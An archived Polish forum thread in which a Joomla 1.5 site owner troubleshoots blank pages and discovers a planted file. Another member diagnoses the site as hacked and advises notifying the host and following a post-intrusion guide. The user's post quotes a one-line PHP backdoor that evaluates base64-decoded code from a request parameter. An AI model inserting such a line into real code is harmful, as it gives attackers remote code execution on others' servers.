PDA

Zobacz pełną wersję : Biała strona - front i back end



jon
27-02-2013, 13:28
Czesc,
jest to moj pierwszy post gdyz dopiero teraz nie umielem znalezc problemu na problem ktory sie u mnie pojawil.
Mianowicie po wejsciu na strone http://goo.gl/eHAUk
pojawia sie pusta strona ...kompletnie nic procz heada :)


ale jesli wejsde na strone administratora to juz mam chociaz panel logowania, jednak to tez nie na wiele sie zda bo po wpisaniu loginu i hasla otrzymuje identyczny rezultat - pusta strone :(
http://goo.gl/dLNAH


próbowałem podmienić w configuration raporotwanie błędów zarówno na 1 jak i 6135 jak radzili różni mądrzy ludzie jednak bez rezultatu nie mam żadnego błędu.


Jeszcze dziś wieczorem sprawdze ten trop bo może nie obsługuje mysql w wersji 5.1.x


Ustawienia serwera:
Wersja MySQL 5.1.66-cll
Wersja PHP 5.2.17




Oprogramowanie zalecane + minimum
PHP 5.2 minimum + 4.3.10
MySQL 4.1.x minimum + 3.23


Mimo wszystko czy ktoś ma jeszcze jakies pomysły?

Używam joomli 15.2

zwiastun
27-02-2013, 14:15
Używam joomli 15.2
To niekoniecznie musi mieć związek, aczkolwiek...
Najpierw aktualizacja a potem kombinacja.

jon
27-02-2013, 14:31
Hmm...
czyli co backup bazy i wgranie pod nowe wersje? Bo z panelu admina nic nie zrobie :)

zwiastun
27-02-2013, 14:56
Jeśli nic nie zmieniałeś w plikach Joomla, to możesz i bez backupu bazy. Nadpisz pliki najnowsza wersja Joomla 1.5 (bez katalogu installation) i zobacz co będzie. A nuż się problem "rozwiąże".
Wcześniej dobrze by przypomnieć sobie dokładnie, co ustatnio robiłeś, dodawałeś, zmieniałeś, przestawialeś (najlepiej zrobić listę), a następnie przywracać poprzednie stany albo z backupu, którego pewno nie masz, albo manipulując bezpośrednio w bazie danych

jon
27-02-2013, 20:17
Ok zorbiłem w nastepujacy sposób wgrałem nowa kopie joomli tez 1.5.2 i podmieniłem jedynie plik configuration.php - Ok wszystko jest prócz modułów i dodatków - będzie trzeba doinstalować
ale zaczałem porównywać i w pliku z logami (tak mi sie wydaje ..../logs/Footerl.php) jest własnie ten pliczek którego nie ma w nowej instalacji a w nim linijka

<?PHP defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment']))); ?>

no i zaczałem sprawdzac co to znaczy ... ale na razie stoje w miejscu :)
gdyby ktoś miał wkazówke to prosze o info :)

zwiastun
27-02-2013, 20:50
To znaczy, że Twoja witryna została zhakowana - ktoś operuje na Twoim koncie na serwerze i najprawdopdobniej nie tylko na Twoim koncie. I, niestety, jest to Twoja wina.
Działania:
1. Powiadomienie administratora serwera o incydencie
2. Postępowanie według: wiki > Witryna po włamaniu.

jon
28-02-2013, 10:01
No nie ładnie tak :)
Czy aby w przyszłości nie popełniać takich błędów to jakaś dobra rada?
Bo rozumiem że czytanie na bieżąco i aktualizacja to podstawa...